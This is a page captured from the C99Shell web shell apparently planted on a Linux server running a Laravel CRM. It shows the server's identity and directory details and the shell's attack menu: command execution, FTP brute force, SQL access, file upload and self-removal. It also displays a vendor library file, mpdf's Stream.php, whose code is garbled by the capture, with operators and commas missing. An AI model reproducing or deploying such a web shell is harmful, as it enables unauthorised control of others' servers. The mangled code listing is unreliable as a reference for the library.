!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/vendor/mpdf/psr-http-message-shim/src/   drwxrwxrwx
Free 12.93 GB of 57.97 GB (22.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Stream.php (5.01 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Mpdf\PsrHttpMessageShim;

/**
 * @link nyholm/psr7
 */
class Stream implements \Psr\Http\Message\StreamInterface
{
    
/**
     * A resource reference.
     *
     * @var resource
     */
    
private $stream;

    
/**
     * @var bool
     */
    
private $seekable;

    
/**
     * @var bool
     */
    
private $readable;

    
/**
     * @var bool
     */
    
private $writable;

    
/**
     * @var array|mixed|null|void
     */
    
private $uri;

    
/**
     * @var int
     */
    
private $size;

    
/** @var array Hash of readable and writable stream types */
    
private static $readWriteHash = [
        
'read' => [
            
'r' => true'w+' => true'r+' => true'x+' => true'c+' => true,
            
'rb' => true'w+b' => true'r+b' => true'x+b' => true,
            
'c+b' => true'rt' => true'w+t' => true'r+t' => true,
            
'x+t' => true'c+t' => true'a+' => true,
        ],
        
'write' => [
            
'w' => true'w+' => true'rw' => true'r+' => true'x+' => true,
            
'c+' => true'wb' => true'w+b' => true'r+b' => true,
            
'x+b' => true'c+b' => true'w+t' => true'r+t' => true,
            
'x+t' => true'c+t' => true'a' => true'a+' => true,
        ],
    ];

    private function 
__construct()
    {
    }

    
/**
     * @param resource $resource
     *
     * @return Stream
     */
    
public static function createFromResource($resource)
    {
        if (!
is_resource($resource)) {
            throw new 
\InvalidArgumentException('Stream must be a resource');
        }

        
$obj = new self();
        
$obj->stream $resource;
        
$meta stream_get_meta_data($obj->stream);
        
$obj->seekable $meta['seekable'];
        
$obj->readable = isset(self::$readWriteHash['read'][$meta['mode']]);
        
$obj->writable = isset(self::$readWriteHash['write'][$meta['mode']]);
        
$obj->uri $obj->getMetadata('uri');

        return 
$obj;
    }

    
/**
     * @param string $content
     *
     * @return Stream
     */
    
public static function create($content)
    {
        
$resource fopen('php://temp''rwb+');
        
$stream self::createFromResource($resource);
        
$stream->write($content);
        
$stream->seek(0);

        return 
$stream;
    }

    
/**
     * Closes the stream when the destructed.
     */
    
public function __destruct()
    {
        
$this->close();
    }

    public function 
__toString(): string
    
{
        try {
            if (
$this->isSeekable()) {
                
$this->seek(0);
            }

            return 
$this->getContents();
        } catch (
\Exception $e) {
            return 
'';
        }
    }

    public function 
close(): void
    
{
        if (isset(
$this->stream)) {
            if (
is_resource($this->stream)) {
                
fclose($this->stream);
            }
            
$this->detach();
        }
    }

    public function 
detach()
    {
        if (!isset(
$this->stream)) {
            return;
        }

        
$result $this->stream;
        unset(
$this->stream);
        
$this->size $this->uri null;
        
$this->readable $this->writable $this->seekable false;

        return 
$result;
    }

    public function 
getSize(): ?int
    
{
        if (
$this->size !== null) {
            return 
$this->size;
        }

        if (!isset(
$this->stream)) {
            return 
null;
        }

        
// Clear the stat cache if the stream has a URI
        
if ($this->uri) {
            
clearstatcache(true$this->uri);
        }

        
$stats fstat($this->stream);
        if (isset(
$stats['size'])) {
            
$this->size $stats['size'];

            return 
$this->size;
        }
        return 
null;
    }

    public function 
tell(): int
    
{
        
$result ftell($this->stream);

        if (
$result === false) {
            throw new 
\RuntimeException('Unable to determine stream position');
        }

        return 
$result;
    }

    public function 
eof(): bool
    
{
        return !
$this->stream || feof($this->stream);
    }

    public function 
isSeekable(): bool
    
{
        return 
$this->seekable;
    }

    public function 
seek(int $offsetint $whence SEEK_SET): void
    
{
        if (!
$this->seekable) {
            throw new 
\RuntimeException('Stream is not seekable');
        }

        if (
fseek($this->stream$offset$whence) === -1) {
            throw new 
\RuntimeException('Unable to seek to stream position '.$offset.' with whence '.var_export($whencetrue));
        }
    }

    public function 
rewind(): void
    
{
        
$this->seek(0);
    }

    public function 
isWritable(): bool
    
{
        return 
$this->writable;
    }

    public function 
write(string $string): int
    
{
        if (!
$this->writable) {
            throw new 
\RuntimeException('Cannot write to a non-writable stream');
        }

        
// We can't know the size after writing anything
        
$this->size null;
        
$result fwrite($this->stream$string);

        if (
$result === false) {
            throw new 
\RuntimeException('Unable to write to stream');
        }

        return 
$result;
    }

    public function 
isReadable(): bool
    
{
        return 
$this->readable;
    }

    public function 
read(int $length): string
    
{
        if (!
$this->readable) {
            throw new 
\RuntimeException('Cannot read from non-readable stream');
        }

        return 
fread($this->stream$length);
    }

    public function 
getContents(): string
    
{
        if (!isset(
$this->stream)) {
            throw new 
\RuntimeException('Unable to read stream contents');
        }

        
$contents stream_get_contents($this->stream);

        if (
$contents === false) {
            throw new 
\RuntimeException('Unable to read stream contents');
        }

        return 
$contents;
    }

    public function 
getMetadata(?string $key null): bool
    
{
        if (!isset(
$this->stream)) {
            return 
$key null : [];
        }

        if (
$key === null) {
            return 
stream_get_meta_data($this->stream);
        }

        
$meta stream_get_meta_data($this->stream);

        return isset(
$meta[$key]) ? $meta[$key] : null;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0048 ]--